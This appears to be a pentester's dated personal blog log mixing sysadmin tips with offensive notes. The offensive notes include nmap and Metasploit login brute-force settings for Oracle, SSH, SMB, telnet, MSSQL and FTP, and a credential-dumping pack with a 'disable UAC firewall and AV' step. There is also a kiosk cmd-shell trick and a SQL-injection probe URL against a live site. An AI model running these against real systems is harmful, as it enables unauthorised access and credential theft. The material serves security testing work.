06/10/2012 - 650KB/s over open proxies with downloadthemall/rmccurdy.com/scripts/proxy/proxychains.conf
I will update the proxycheck script to include thist bit later.

05/22/2012 - some command line fu
# set power profile via command line
Powercfg.exe /SETACTIVE "Always On"
Powercfg.exe /SETACTIVE "Max Battery"
#Remove the .NET Credentials (Stored User names and Passwords)
Control keymgr.dll

04/24/2012 - Client_Enumeration_Java_Adobe_Reader_flash.zip Client side HTML/Java code to enumerate Java, Adobe Reader and Flash Versions

04/24/2012 - Openvas in Ubuntu

echo 'GSA_HTTP_ONLY=1' >> /etc/default/greenbone-security-assistant

[ "$GSA_HTTP_ONLY" ] && [ "$GSA_HTTP_ONLY" = 1 ] && DAEMONOPTS="$DAEMONOPTS --http-only"
remove src from sources list along with matching the /etc/lsb-release ver too

add-apt-repository "deb http://download.opensuse.org/repositories/security:/OpenVAS:/STABLE:/v4/xUbuntu_11.XX/ ./"

grep -ia open /etc/apt/sources.list deb http://download.opensuse.org/repositories/security:/OpenVAS:/STABLE:/v4/xUbuntu_11.04/ ./ #deb-src http://download.opensuse.org/repositories/security:/OpenVAS:/STABLE:/v4/xUbuntu_11.04/ ./

if you still have issues just run 'killall gsad;sleep 5;gsad --http-only --listen= -p 9392
watch -d 'ps axuwww|grep nasl|grep -v grep'

view source omp -h -p 9390 -u admin -w password -X "$RANDOM`cat in|sed 's/$/,/g'|tr -d '\n'`"

04/18/2012 - update_nmap_oracle_sids_userpass.exe

# sid enum using nmap and metasploits sid.txt 1307 sids in ~8 seconds
nmap -n --script=oracle-sid-brute -p 1521-1560

# try 1255 user/pass
# requires valid SID  ( default is XE )
# Performed 1245 guesses in 3 seconds, average tps: 415
nmap --script oracle-brute -p  1521-1560 --script-args oracle-brute.sid=XE  -n

# oracle shell using OAT Oracle Audit Tool
ose.bat -s -u SYS -p CHANGE_ON_INSTALL -d XE -t Windows

04/17/2012 - Metasploit with Oracle !
following :http://www.metasploit.com/redmine/projects/framework/wiki/OracleUsage
2:10 PM 4/17/2012
# Remove ruby using apt or synaptic etc ..
apt-get remove ruby

# update and install 1.9.1 dev
apt-get update
apt-get install ruby1.9.1-dev -y

mkdir /opt
mkdir /opt/oracle

# copy zips to /opt/oracle
cp *.zip /opt/oracle
cd /opt/oracle

unzip basic-
unzip sdk-
unzip sqlplus-

cd instantclient_10_2/
ln -s libclntsh.so.10.1 libclntsh.so

# add this to ~/.bashrc and also type it in current shell

export PATH=$PATH:/opt/oracle/instantclient_10_2
export SQLPATH=/opt/oracle/instantclient_10_2
export TNS_ADMIN=/opt/oracle/instantclient_10_2
export LD_LIBRARY_PATH=/opt/oracle/instantclient_10_2
export ORACLE_HOME=/opt/oracle/instantclient_10_2

# wget http://rubyforge.org/frs/download.php/65896/ruby-oci8-2.0.3.tar.gz

tar xvzf ruby-oci8-2.0.3.tar.gz
cd ruby-oci8-2.0.3/
make install

# download msf .run bin installer
# I had to edit the  /pentest/exploits/framework/.svn/entries and add www. to the file so you could run svn update

cd /pentest/exploits/framework/
svn update

# run MSFconsole from /pentest/exploits/framework/ not the init scipt this will allow for use of YOUR env and not the static one for MSF binary
cd /pentest/exploits/framework/

#from msfconsole install ruby-oci8 gem
gem install ruby-oci8

If you still get the missing OCI error it is all ruby the oracle client loads after

# oracle_login needs nmap > 5.50 !

wget http://nmap.org/dist/nmap-5.51.tgz
tar -xvf nmap-5.51.tgzm
cd nmap-5.51
make install

ln -s /usr/local/bin/nmap /usr/bin/nmap

--------------- msf stuff ---------
# as always you can spool log.log to save logfile or use screen -L

# brutes ~576 sids will eat targets file
use auxiliary/scanner/oracle/sid_brute
set RHOSTS file://home/rmccurdy/oracle

# This module attempts to authenticate 568 line USERPASS_FILE list
# requires SID
use auxiliary/scanner/oracle/oracle_login
set RPORTS 1521
set RHOSTS file://home/rmccurdy/oracle
set SID XE

# needs oci !!!
# This module uses a ~598 line list of well known default authentication credentials to discover easily guessed accounts.
use auxiliary/admin/oracle/oracle_login
set RHOSTS file://home/rmccurdy/oracle
set RPORTS 1521

# needs oci !!!
# needs full login/password/sid audits database and or user
# https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/admin/oracle/oraenum.rb

use auxiliary/admin/oracle/oraenum

04/17/2012 - Configuring the Scrollback Buffer

By default, the scrollback buffer only keeps the last 100 lines of text, which is not enough for my typical interaction with Screen. I.ve found a setting of 5000 lines to be more than adequate for my usage. The number of scrollback lines can be configured in your $HOME/.screenrc file, by adding the following line:

defscrollback 5000

04/16/2012 - Block Facebook with Adblock Plus! :

Make new custom filter and add these three filters:


04/13/2012 - cygwin_portable.zip

* NESSUS_PARSE.BAT ( parse Nessus .nessus XML files to CSV )
* NMAP.BAT ( scans top 20 ports from targets file and then does full scan/automatic parse to CSV )
* NMAP_PARSE.BAT ( parse NMAP xml scans from -oA output )
* FIND_ROUTERS.bat ( automated search for routers to find other networks on 192. , 172. and 10. when you have no scope or want to find other networks/hosts in a LAN 'in development' )
* WEBDUMP in /bin (This script will quickly download a large number of websites first page then remove duplicates to find potential targets for attack http://rmccurdy.com/scripts/web_dump.sh )
* Bash_Shell.bat (PERL RUBY and PYTHON support in a Cygwin Bash Shell )

Here is the download link ( tested in XP and WIN7 )


04/12/2012 - masspwdumper.exe

This is a pack/script to run a suite of password/cached credentials utility. You get anything from saved internet cookies to plain text passwords to network/local resources !



* DISABLE UAC FIREWALL AND AV for best results

* YOU NEED TO HAVE GUI FOR MPR Multi Password Recover.exe,Password Recovery Bundle.exe and sometimes some of the carrot.exe options /ieco /ff   





* MPR Multi Password Recover.exe  ( GUI tool )

* Password Recovery Bundle.exe ( GUI tool )

* fgdump.exe ( Dump password hash )

* carrot.exe ( Suite of tools most of them are nirsoft.net )



04/10/2012 - News

[Tool update] - Gason: sqlmap plugin for burpsuite proxy

CIntruder: Cracking captcha from url

Free malware scanning and blacklist monitoring for websites

01/17/2012 - UPDATED: proxycheck.sh

01/17/2012 - UPDATED: feeds.rmccurdy.com
# sonofsamy.wordpress.com
# exploit-db.com
# securinfos.info
# vupen.com
# professionalsecuritytesters.org
# info
# securitytracker.com
# news.securitytracker.com
# taosecurity.blogspot.com
# gossamer-threads.com
# net-security.org
# kb.cert.org
# cert.org
# milw0rm.com
# seclists.org
# us-cert.gov
# f-secure.com
# securityvulns.com
# osvdb.org
# securityfocus.com
# wordpress.com
# blogspot.com
# twitter.com

12/30/2011 - I.m bringing sexy back !! well .. 1989 ... After Dark screensaver Flying Toasters After Dark screensaver Flying Toasters.exe No midi thank god !!! bit wonkey you can look at the install.bat and .reg files. for some reason it needs full R/W to its HKLM install path in the registry. Tested on XP and WIN7 !

12/15/2011 - Disable Metasploit / Enable Metasploit in windows.
# disable stop script
net stop "Metasploit Pro Service"
net stop "Metasploit Thin Service"
net stop metasploitPostgreSQL
sc config metasploitProSvc   start= disabled
sc config metasploitThin  start= disabled
sc config metasploitPostgreSQL  start= disabled

# enable start script
sc config metasploitProSvc   start= auto
sc config metasploitThin  start= auto
sc config metasploitPostgreSQL  start= auto
net start "Metasploit Pro Service"
net start "Metasploit Thin Service"
net start metasploitPostgreSQL

11/01/2011 - UDDATED Proxycheck.sh good.txt is updated weekly over 5K proxies tested ~500 HTTP

06/23/2011 - Here are some MSF/SET and NMAP notes for brute force (for MSF for M$ ),VNC bypass and Airbase :

## MSF

 auxiliary/scanner/smb/pipe_auditor                                           normal     SMB Session Pipe Auditor
   auxiliary/scanner/smb/pipe_dcerpc_auditor                                    normal     SMB Session Pipe DCERPC Auditor
   auxiliary/scanner/smb/smb2                                                   normal     SMB 2.0 Protocol Detection
   auxiliary/scanner/smb/smb_enumshares                                         normal     SMB Share Enumeration
   auxiliary/scanner/smb/smb_enumusers                                          normal     SMB User Enumeration (SAM EnumUsers)
   auxiliary/scanner/smb/smb_enumusers_domain                                   normal     SMB Domain User Enumeration
   auxiliary/scanner/smb/smb_login                                              normal     SMB Login Check Scanner
   auxiliary/scanner/smb/smb_lookupsid                                          normal     SMB Local User Enumeration (LookupSid)

# vnc bypass oneliner
nmap -sV -sC -iL c:\temp\vnc.txt -p 5900

# ssh logins
use auxiliary/scanner/ssh/ssh_login
set USER_FILE "C:/wordlist/password_small.txt"
set RHOSTS_FILE "C:/wordlist/targests.txt"


use auxiliary/gather/dns_enum
set DOMAIN domain.com

set RHOSTS  
use auxiliary/scanner/smb/smb_login


set USER_FILE "C:/wordlist/users.txt"
set PASS_FILE "C:/wordlist/2.txt"
set VERBOSE false
set THREADS 16

# http

use auxiliary/scanner/http/http_login
set AUTH_URI /folder?dcPath=ha-datacenter
set VERBOSE true


# telnet
use auxiliary/scanner/telnet/telnet_login
set RHOSTS,49,50

set PASS_FILE "C:/wordlist/password_small.txt"
set THREADS 254


# mssql
use auxiliary/scanner/mssql/mssql_login
set PASS_FILE "C:/wordlist/password_small.txt"
set VERBOSE false



use auxiliary/scanner/ftp/ftp_login
set PASS_FILE "C:/wordlist/password_small.txt"

use auxiliary/scanner/snmp/snmp_login
set PASS_FILE "C:/wordlist/snmp_default_pass.txt"
set VERBOSE false


## SET


08/10/2011 - Updated iKAT . Interactive Kiosk Attack Tool http://console.rmccurdy.com

06/23/2011 - Information Leakage

FOCA . Document meta-data retrieval and analysis, domain enumeration
Maltego . Transform/processing engine for correlation and linking objects
Creepy . Geo-location information gatherer http://ilektrojohn.github.com/creepy
Shodan . Web server search engine
Metagoofil . Document meta-data command-line tool
Wikto . web server vulnerability and folder enumeration
Bespoke scripts . contact me offline for some quick and dirty bash scripts which automate some tasks
u = Number of usernames enumerated
nf = Number of network folders enumerated
e = Number of email addresses
vs = Number of vulnerable internal software versions
wv = Number of known vulnerabilities in version of web server
ev = Number of vulnerabilities in version of mail server
gg = Number of Google Groups postings
r = Number of robots.txt entries
Exposure = u+nf+e+vs+wv+ev+gg+r / 9
RSA = (3+3+2+2+1+1+4+1)/8 = 17/9 = 2
Problem with such calculations is lack of account for context Un disclosed source
06/23/2011 -

Nice technique for opening cmd:
1) Open MSPaint and change image attributes to: Width=6 and Height=1 pixels.
2) Set pixels values to (from left to right):
1st: R: 10, G: 0, B: 0
2nd: R: 13, G: 10, B: 13
3rd: R: 100, G: 109, B: 99
4th: R: 120, G: 101, B: 46
5th: R: 0, G: 0, B: 101
6th: R: 0, G: 0, B: 0
3) Save it as 24-bit Bitmap (*.bmp;*.dib)
4) Change it's extension from bmp to bat and run.
http://www.digitalwhisper.co.il/0x26/ 06/02/2011 - theHarvester.py email Harvester


./theharvester.py -d microsoft.com -l 50 -b google
./theharvester.py -d microsoft.com -l 50 -b bing
./theharvester.py -d microsoft.com -l 50 -b pgp
./theharvester.py -d microsoft.com -l 50 -b linkedin
./theharvester.py -d microsoft.com -l 50 -b google-profiles
./theharvester.py -d microsoft.com -l 50 -b exalead

05/18/2011 - Malware Analysis

Also been messing with Malware Analysis tools. Let me know if you want any more info on these. Still a total noob doing crackmes.


·         Portable IDA Pro with IDAPython/stealth plug-in

·         Portable Reflector a Class browser and analysis tool for  .NET >=4 Decompile  

·         malware_analyser 3.0

·         yara exe with sigs ( needs more work.. )

·         DeFixed_Edition_v2 ( olly / ton plug-in etc )



















As a free service:
* Norman SandBox (http://www.norman.com/security_center/security_tools/)
* Anubis (http://anubis.iseclab.org)
* CWSandbox (http://www.mwanalysis.org/)
* ThreatExpert (http://www.threatexpert.com)
* Comodo Camas (http://camas.comodo.com)
* MalBox (http://malbox.xjtu.edu.cn)

Commercial products:
* Norman SandBox (http://www.norman.com/products/sandbox_malware_analyzers/en)
* GFI Sandbox (http://www.sunbeltsoftware.com/Malware-Research-Analysis-Tools/Sunbelt-CWSandbox/)
* Joe Sandbox (http://www.joesecurity.com)
* ThreatExpert ?

* Buster's Sandbox Analyzer (http://bsa.isoftware.nl)

Open Source:
* Cuckoo Sandbox (http://www.cuckoobox.org)
* Truman Sandbox (http://www.secureworks.com/research/tools/truman/)
* ZeroWine (http://sourceforge.net/projects/zerowine/)
* ZeroWine Tryouts (http://zerowine-tryout.sourceforge.net/)

04/26/2011 - Updated Yahoo movies feed movies.html
04/12/2011 - Yay mod_bw

BandwidthModule On
ForceBandWidthModule On
LargeFileLimit * 1000 10000
MaxConnection all 3

03/28/2011 - Sick of setting file associations ? this is what I use on my portable apps ! acc.bat.txt

03/06/2011 - Portable virtual windows !?!? http://fcportables.blogspot.com/2011/01/portable-microxp-2011.html  using QEMU to load ISO files http://milky.manishsinha.net/2008/07/10/using-qemu-on-windows/  

03/1/2011 - Updating flash in firefox the right way.... http://www.varesano.net/blog/fabio/installing%20flash%20player%20plugin%20firefox%20without%20having%20administrator%20access%20or%20premissions
also neat is http://ninite.com

02/28/2011 - Normal cygwin/ruby/perl 400megs 22K files .. Cameyo packaged 121 megs Portable Cygwin http://db.tt/qp2nKi5 Run the EXE and wait a long time if you still have errors wait close and reopen contains ruby/perl/make/c++/automake/screen

02/28/2011 - Go away bots .. I have no PHP here .. RewriteCond %{QUERY_STRING} ^.*\&.*$ [NC]

02/26/2011 - Fixed my Hacker Safe logo /public_images/H4CK3R54F3.jpg

02/26/2011 - Proxbrute Proxmark3 Brute force RFID http://www.proxmark.org/forum/topic/713/proxbrute/

02/23/2011 - Updated yahoo pipe for comics http://comics.rmccurdy.com

01/21/2011 - Updated http://feeds.rmccurdy.com


01/21/2011 - john 1337 speak worlist gen:

The default john.conf includes some rules like that, enabled for "single crack" mode only by default. You may copy the lines between these two comments:
# The following 3l33t rules are based on original Crack's dicts.rules
# Now to the prefix stuff...
into the [List.Rules:Wordlist] section to have them enabled for wordlist mode as well. usage: john -w=wordlist --stdout --rules

11/13/2010 - FLoP's fpg false positive generator for IDS:
Static BIN for BT4 : FPG.zip
Fpg: http://www.geschke-online.de/doc/c2398.html
Fpg src : http://www.geschke-online.de/FLoP/src/FLoP-1.6.1.tar.gz

11/10/2010 - Full Update Guide - Fender/1.2 32A (myTouch 3G 1.2 / Fender LE (3.5mm jack) version) I can't bring myself to mod it yet but I did get root with Universal Androot 1.6.2 beta 5 apk temp root for the current T-mobile build
10/05/2010 - RS links are all dead and gave up on yahoo pipes regex is hit or miss for 3 weeks ... movies.html

10/02/2010 - lighttpd FTW :
# limit max connections per ip and limit bandwidth
server.kbytes-per-second = 10
evasive.max-conns-per-ip = 2
connection.kbytes-per-second = 10

09/13/2010 -
Sipdroid / sip.sipdiscount.com

08/01/2010 -

Creative Loafing:
week http://rmccurdy.com/scripts/clatl.com.html
weekend http://rmccurdy.com/scripts/clatl.com_ss.html
Atlanta Events Calendar - Search Upcoming Events in Atlanta:
Atlanta Motor Speedway | Events
Atlanta, GA Events and Attractions by Citysearch
funny farm comedy club
The Punchline - Atlanta's premier comedy club!

07/14/2010 - Tutorial WIM image files wimfltr.sys Windows Image File Filter Driver command line install

I have an H drive ( using junction to link C:\users\internet\Documents\my dropbox to h:\ ) I wanted to easily update files that triggerd AV so I zipped them up. I update the zip often and was testing for other options and this is what I tried.

* h:\junction.exe -s "C:\users\internet\Documents\my dropbox" h: this is howto change location of dropbox sync :)

* google for the drivers ImageX_x86

* install the driver
rundll32 syssetup,SetupInfObjectInstallAction DefaultInstall 128 .\ImageX_x86\wimfltr.inf

* create an image of a DRIVE ( cannot be mapped drive OR junction 'ln for windows' )
.\ImageX_x86\imagex.exe /capture d:\ c:\twf.wim "WIM Compress" /compress maximum

* umount image
.\ImageX_x86\imagex.exe /unmount /commit c:\cygwin

* mount image
.\ImageX_x86\imagex.exe /mountrw .\cygwin.wim 1 c:\mount

* even with 'maximum' compresstion images are larger then the source files in most cases... ???
* 80meg zip of Cygwin ~300 unzipped becomes 600 WIM file ???
* requires admin rights to install drivers but still beats zipping and unzipping items that trigger AV
reference: http://technet.microsoft.com/en-us/library/cc749447%28WS.10%29.aspx

06/12/2010 - low on disk space android G1 find / -name traces.txt -exec rm -Rf {} \; something kept crashing while I was AFK and caused this traces.txt file to get huGe
06/05/2010 - *lix/windows full disk encryption 'part crypt' on the cheap !
06/03/2010 - http://comics.rmccurdy.com huge mashup of comics! http://pipes.yahoo.com/pipes/pipe.run?_id=ccd5e025249a09a9358ede1d3e238eab&_render=rss
05/30/2010 - yahoo new dvd A or B after 2009 > nzbindex.nl search
05/27/2010 - Android stream ripper http://www.greencode.me/imusic apk: http://tinyurl.com/imusic1
04/30/2010 - QuranReciter http://www.ShaPlus.com Friend was asking about the software so justa re-visit

04/29/2010 - Dropbox portable any path without "my dropbox" in M$ ... DropboxDataWrapper DropboxPath FAILSAUSE


* Administrator ( possibly for dropbox advanced options )
* NTFS on the host computer !


* Download DROPBOX
Recommended using the potable dropbox ICE because it has (UsbGuard (0.5.3) - Prevents Data Loss by killing DropBox.exe if you accidentally unplug your usb drive (included)
DropBox Portable ICE 0.5.3 -SuPPoRT aLL DRoPBoX VeRSioNs | Updated : 11-04-2010


* Download Junction v1.05 from sysinternals .symbolic links, where a directory serves as a symbolic link to another directory on the computer..
* Start dropbox
* Get the link to your dropbox folder path
* Create the sym link to whatever path you like example
rd /q/s "C:\Documents and Settings\internet\My Documents\My Dropbox"
Junction.exe "C:\Documents and Settings\internet\My Documents\My Dropbox" h:\

To delete a sym link use this command:
Junction.exe -d "C:\Documents and Settings\internet\My Documents\My Dropbox"

NOTES: there is a time tradeoff the dropbox.cache folder get queried a LOT and other I/O is sent to the target I would say for 16K files ~2gigs it took ~20-30min where as if it was just a read from the flash disk it would be under 10min

04/26/2010 - ROUTER DIED server was down for about 5hrs today if anybody but bots noticed ...
04/23/2010 - Metasploit meterpreter cheat sheet reference.html All the meterpreter commands I could find / create
04/19/2010 - sprint login script curl .php.txtSprint login script using php / curl
04/16/2010 - UDDATED http://feeds.rmccurdy.com
04/15/2010 - UDDATED Proxycheck.sh good.txt is updated weekly
04/14/2010 - konika script users scan to email for 353 and 350.sh.txtbash/curl script to parse XLS contact list and add it to konika 353 and 350 printers :)
04/14/2010 - movamp.zip Portable AMP Portable apache / php / phpmyadmin / MySQL only 10megs ! change the httpd.conf paths and wala !
03/30/2010 - FIXED Yahoo rotten tomatoes newzbin nzb DVD sabnzbd downloader
03/01/2010 - To set up Yahoo E-Mail in Android:

log-in to your yahoo mail
go to Options, then Account, followed by .Add or edit an account.
select .Account Information. on the left
on the " Preferred Content," change it to Yahoo Asia

  1. Make sure Wi-Fi is turned off
  2. Press the E-Mail icon (the default Android E-Mail application)
  3. Enter your Yahoo E-Mail address and password
  4. Press .Manual Setup. in the lower left hand corner
  5. For .Incoming Server Settings. set the IMAP server to .imap.mail.yahoo.com. and the Port to 143
  6. For .Outgoing Server Settings. set the SMTP Server to .smtp.mobile.mail.yahoo.com. and the Port to 587
  7. Check .Require sign-in. and press Next
  8. Select how often your phone will check for Email, and choose default options
  9. Give the account a name and set your display name for outgoing messages


02/23/2010 - Yahoo rotten tomatoes newzbin nzb DVD sabnzbd downloader Rss feed of 'good' movies to aim at SABnzbd
02/18/2010 - quickbaksmali.zip

* requires java ! in %PATH% !
* just place the java_ee_sdk-5 folder to make it portable !
* put the APKS files in the folder APKS
* you (can) edit the job2.bat with your keytool/key info etc ..

* run the baksmali.bat
* make your changes etc
* run the smali.bat

you should see the updated \META-INF folder in the 'new' apk
and the classes.dex should be new.

02/18/2010 - chsh: entry inconsistent or change shell in FreeBSD `vipw;chsh -s /bin/PATHTOSHELL` vipw != vi /etc/passwd ...
02/04/2010 - Updated LFI.txt http://ha.ckers.org/weird/rfi-locations.dat
01/07/2010 - Full Update Guide - G1/Dream Firmware to CyanogenMod - CyanogenMod Wiki

01/07/2010 - MYTHTV ON UBUNTU 9.10 1TB RAID1

12/08/2009 - Portable Metasploit 3.4-dev svn r7752 Portable_Metasploit_3.4-dev_svn_r7752.exe

12/01/2009 - FreeBSD rtld Lets Local Users Gain Root Privileges http://rmccurdy.com/scripts/downloaded/localroot/freebsd/ binary for 7.2

11/30/2009 - HD on the Mythbox ! Thank you Kimball !
* Panasonic TC - P50X1 - 50" plasma panel - 720p
* VGA compatible controller: nVidia Corporation NV40 [GeForce 6800 GT] (rev a1)
* Intel(R) Pentium(R) 4 CPU 3.00GHz
* WinTV-PVR-500 MC-Kit Tuner
* MemTotal: 512572 kB

11/20/2009 - android busybox nmap G1 android port scanner ...sort of
The busybox I have on my phone does not have pscan here is one to download:
* keep it the same name and COPY to /data/local/bin
cp /sdcard/busybox /data/local/bin/
chmod 775 /data/local/bin/busybox
pscan.sh 192.168.0
more android stuff : http://delicious.com/operat0r/android
* this is by no means NMAP ! still waiting for a nmap for android

11/12/2009 - UPDATED/FIXED feeds.rmccurdy.com - 30 feeds ( to be added secunia.com if I can )

11/11/2009 - ettercap + echo www.google.com A > etter.dns = easy rickroll
11/11/2009 - FIXED limit max number of connections in apache ${fwcmd} add 10 allow tcp from any to any 80 out via dc0 limit dst-addr 2 ( I had issues with huge number of FIN_WAIT_2 )
11/11/2009 - Server boot drive (80gig) failed clean 7.2 freebsd install !
11/11/2009 - UPDATED SNORTUPDATE.sh script fixed some of syntax errors etc ..
10/03/2009 - UPDATED the nikto_v20 and nikto_v10 files takes a webinspect > privoxy log and downloads latest nikto and combines with urls.txt a RFI list I update and converts them all to nikto 2 and nikto 1 db formats.. to be used with w3af,nikto and wikto etc .. 16339 lines 1.6 megs
09/26/2009 - G1 T-mobile Root
08/26/2009 - FIXED quickvnc.exe Fixed now only looks for established connection running winvnc.exe to fix strange issues not showing the remote host ...
08/26/2009 - FIXED OEM.EXE overwrites system and system32 ini and bmp files OEMLOGO.BMP and OEMINFO.INI
08/21/2009 - UPDATED http://tw.rmccurdy.com Script to ripp any army in MTW2 can be adapted to use in MTW/RTW etc ..
07/24/2009 - DONATE http://www.ihackcharities.org
06/24/2009 - ADDED fix for clicking time in systray for windows grants everyone http://rmccurdy.com/scripts/allow_time_systray_windows.exe reference: http://blogs.msdn.com/aaron_margosis/archive/2005/02/11/371474.aspx
06/19/2009 - ADDED Scribd ripper script http://rmccurdy.com/scripts/scribd_ripper.php?varpdf=15730844 change the number to the document ID wala !
04/21/2009 - Proxycheck.sh Updated still lame but it works... good.txt is updated weekly
04/17/2009 - sslstrip
04/13/2009 - ADDED VIDEO 30 Days: Outsourcing part1 part2
03/23/2009 - ADDED Portable SwfScanner Screenshot
03/19/2009 - ADDED myipneighbors.bash.txt Idea of this lame script is to find possible vuln params on myipneighbors search results
02/23/2009 - ring.jpg
02/19/2009 - UPDATED Snort/Snotsam ( now I am running more current snort/snortsam and update script is WAY better ... )
02/05/2009 - ADDED packetstorm_dic_john_1337.tar.gz PacketStorm.org wordlist in 1337 speak
01/12/2009 - UPDATED http://www.rmccurdy.com/m3u.m3u All port 80 Shoutcast feeds for thos pesky firewalls ! script can be found in /scripts
01/07/2009 - UPDATED w3af to build 2312 fixed SVN updater and added larger 1meg pykto (nikto ) DB file.
11/21/2008 - ADDED 2.3GIG wordlist
* theargonlistver2_wordlist.zip (83meg) > .rar(154meg) > .lst ( plan text 1.9gigs)
* ran john on it and sort and uniq
* results in 2.3G wordlist no dupes
11/13/2008 - ADDED torrentflux_resume_all.txt
Sick of TF and clicking 900 times to resume all the torrents ? use this ! works for 2.1
* cd to install path
* patch -Np1 < torrentflux_resume_all.txt
* copy the icons form the link below ( or just use ones you already have and change the source)
* resource: http://www.torrentflux.com/forum/index.php?topic=43.0
11/05/2008 - FIXED w3af_1871_fixed.zip portable w3af to current build FIXED!
11/03/2008 - ADDED Portable Metasploit with autopwn ! Metasploitportable.exe pawn on the GO ! ( needs admin and winpcap if you want SYN scans .. )
10/22/2008 - ADDED Medevil Total War 2 MTW2 army ripp script http://tw.rmccurdy.com/
10/21/2008 - UPDATED nikto 2.X nukeit.org and rmccurdy.com sort and uniq 8764 lines! nikto_extra_scans.db
10/08/2008 - UPDATED http://forum.ultravnc.info/viewtopic.php?p=53317#53317 auto reconnect script for ULTRAvnc repeater
09/29/2008 - UPDATES Server was down for a bit for updates removed some services to increase security
09/23/2008 - ADDED http://rmccurdy.com/scripts/downloaded/gtkUiUsersGuide.pdf gtk Ui Users Guide for W3AF!
09/18/2008 - ADDED flickr_rip_LARGE Simple script to ripp flickr images
09/03/2008 - UPDATED feeds.rmccurdy.com added 2 security feeds securityvulns.com and secunia.com
08/14/2008 - VIDEO: ettercap / etterfilter man in the middle ownage
08/14/2008 - myipneighbors.bash.txt myipneighbors > google search for param to help find exploitable scripts
08/14/2008 - UPDATED: w3af_1632.zip w3af GUI for windows portable GTK UI update to build 1632
08/11/2008 - Surf Jacking Gmail demonstration.flv Exploiting sites that use https then http
08/11/2008 - 301 redirect MITM all application request over HTTP So far I only have luck with FF and Opera
08/09/2008 - sedtris.sed Tetris in sed() By: Julia Jomantaite. Here is the shell script to hit enter for you sedtris.sh
08/08/2008 - SSH downgrade attack Old news but news to me.
08/07/2008 - hedgehog A simple proof-of-concept portscanner written in VBA for Excel.
08/06/2008 - Evilgrade hijack updaters request !

Implemented modules:
- Java plugin
- Winzip
- Winamp
- MacOS
- OpenOffices
- iTunes
- Linkedin Toolbar
- DAP [Download Accelerator]
- notepad++
- speedbit

08/05/2008 - Proxycheck.sh Updated still lame but it works...
08/04/2008 - Brute force CSS History Hack Without JavaScript
07/24/2008 - Some issues with the router to the server. Also got a new job. Still working on cracker.rmccurdy.com trying to compile rcracki
07/10/2008 - http://www.freerainbowtables.com FYI if you wanted new rainbow tables now is the time they just updated them lots of seeds !
07/07/2008 - Movies.cgi Quick way to find good movies that are on DVD
04/23/2008 - Download BackTrack 3 Final Here!
04/23/2008 - w3af GUI for windows portable GTK UI update to build 1309 w3af_1309.zip Screen Shot
06/17/2008 - Ya so I got owned by lightning had to replace:
* cable modem
* Netgear wifi router
* 3 NICs
total cost ~70$ downtime 5 days
06/09/2008 - Server was down for a bit for some updates
06/05/2008 - Metasploit.com ARP Pwned
06/05/2008 - CYBS cybersource 2008 Fraud Report.pdf
06/04/2008 - Flash exploit NOT GOOD update flash ASAP ....
06/02/2008 - XSS Cross Site Printing Nice !
06/02/2008 - I am back in town from my little vacation ... I killed my mythbox but now I have the backups automated and SQLdb backed up offsite!
05/23/2008 - SQL Injection Attack At least 70,000 websites have fallen prey to an automated SQL injection attack that exploits several vulnerabilities, including the Microsoft Data Access Components (MDAC)
05/23/2008 - peerguardian Freebsd IPFW script I am on comcast trying to download a ISO for like 3 days not sure if it is comcast or not ..
05/22/2008 - .htaccess issues resolved
05/20/2008 - Different rings telling the difference between switches by the sound of the ring
05/20/2008 - gns3 graphical network simulator that allows you to design complex network topologies and to launch simulations on them
05/17/2008 - SQL Inject via Referer ! This is a new one to me ..
05/14/2008 - "You have received an infraction at Remote Exploit Forums" next message "I am a fan, and appreciate your Flash Ripping Tutorial"
05/01/2008 - [VIDEO] Ripping Flash Templates ! Using URLSnooper / swfdecoder 3 (softlink ) / wget
05/01/2008 - automatic patch-based exploit generation (APEG)
05/01/2008 - http://www.tp2location.com/ Resolve any Telephone Number to its geographical location.
04/24/2008 - Great ! http://olab2.research.microsoft.com/LoginProcess.asp?Email='&Password=
04/24/2008 - find Setuid world writable files find_setuid.txt
04/23/2008 - w3af GUI for windows portable GTK UI !!! portable w3af.zip
04/18/2008 - New video ripping with curl cookies and spidermonkey javascript.swf
04/18/2008 - Fusil the fuzzer Python library used to write fuzzing programs
04/18/2008 - Updated videos.html
04/17/2008 - Proxycheck.sh I could not find a good proxy check tool so this is my hackjob of a script
04/16/2008 - Wfuzz is a tool designed for bruteforcing Web Applications, it can be used for finding resources not linked (directories, servlets, scripts, etc), bruteforce GET and POST parameters for checking different kind of injections (SQL, XSS, LDAP,etc), bruteforce Forms parameters (User/Password), Fuzzing,etc.
04/07/2008 - I finally got around to updating the support link to reflect my new position on end-user security.
03/25/2008 - I made this for Strom Carlson with love Random proverbs generator
03/25/2008 - SMB_RELAY code not using WPAD http://forums.remote-exploit.org/showthread.php?t=12885
03/09/2008 - EH-Net Exclusive: BackTrack 3 Teaser Video download the SWF from www.offensive-security.com
03/09/2008 - Untested Realplayer code http://forums.hackerscenter.com/showthread.php?t=1431
03/09/2008 - w3af gtk user Interface video w3af-gtk-userInterface.mpeg
02/27/2008 - smb_relay exploit with metasploit on a fully patched XP box smb_relay_metasploit.swf
02/26/2008 - Windows login prompt shell using Magnify.exe (WINDOW KEY + U = shell !) VISTA winlogin_easy_shell.exe
02/25/2008 - Re-visit to WebInspect > nikto 2.X nikto_extra_scans.db
02/20/2008 - Updated Quick Clean to support VISTA! quickclean.exe
02/17/2008 - I have the power !
02/08/2008 - UPDATED feeds.rmccurdy.com added http://www.gossamer-threads.com/lists/fulldisc/full-disclosure/
02/08/2008 - UPDATED feeds.rmccurdy.com added custom osvdb RSS feed for full disclosure http://osvdb.org
01/28/2008 - SERVER OUTAGE: Server was out for the longest recored ever 6hrs the motherboard went bad
01/18/2008 - Boot 30GIG HDD had bad blocks replaced with 160GIG Jan 18 17:48:30 rmccurdy kernel: ad0: TIMEOUT - READ_DMA retrying (1 retry left) LBA=27092023
01/18/2008 - Tiger Team 24K Heist
01/17/2008 - Classic Menu addon for Office 2007 auto installer ! Classic Menu Auto.exe
01/16/2008 - Added Video Google hacking DORKS Wikto Aura
01/16/2008 - I poke fun at "hacker safe" logo from scanalert.com H4CK3R 54F3
01/14/2008 - My first eps of www.hackerpublicradio.org dd_rhelp
01/12/2008 - Looks like snort.org force agent tag ! NICE ! updated script .. SNORT.PHP
12/10/2007 - Hackers In Wonderland
11/29/2007 -

john --wordlist=Words.lst --rules --stdout
john will 49 x's Multiply wordlist
theargonlistver2_wordlist.zip (83meg) > .rar(154meg) > .lst ( plan text 1.9gigs)
if it were to go through john it would result in a 85gig ~98,558,569,081 line file..

11/14/2007 - Ping Tunnel - Send TCP traffic over ICMP
11/14/2007 - Major server updates !
